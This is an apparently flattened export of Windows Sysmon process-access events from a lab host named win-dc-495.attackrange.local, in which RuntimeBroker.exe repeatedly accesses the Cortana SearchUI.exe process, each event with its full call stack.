13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405276C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405940C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45406140C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405200C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405200C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405184C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405936C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.195{59A5CD1D-93F9-6005-F104-00000000A301}45405980C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.179{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000012510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.179{59A5CD1D-93F9-6005-F104-00000000A301}45405944C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000012509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
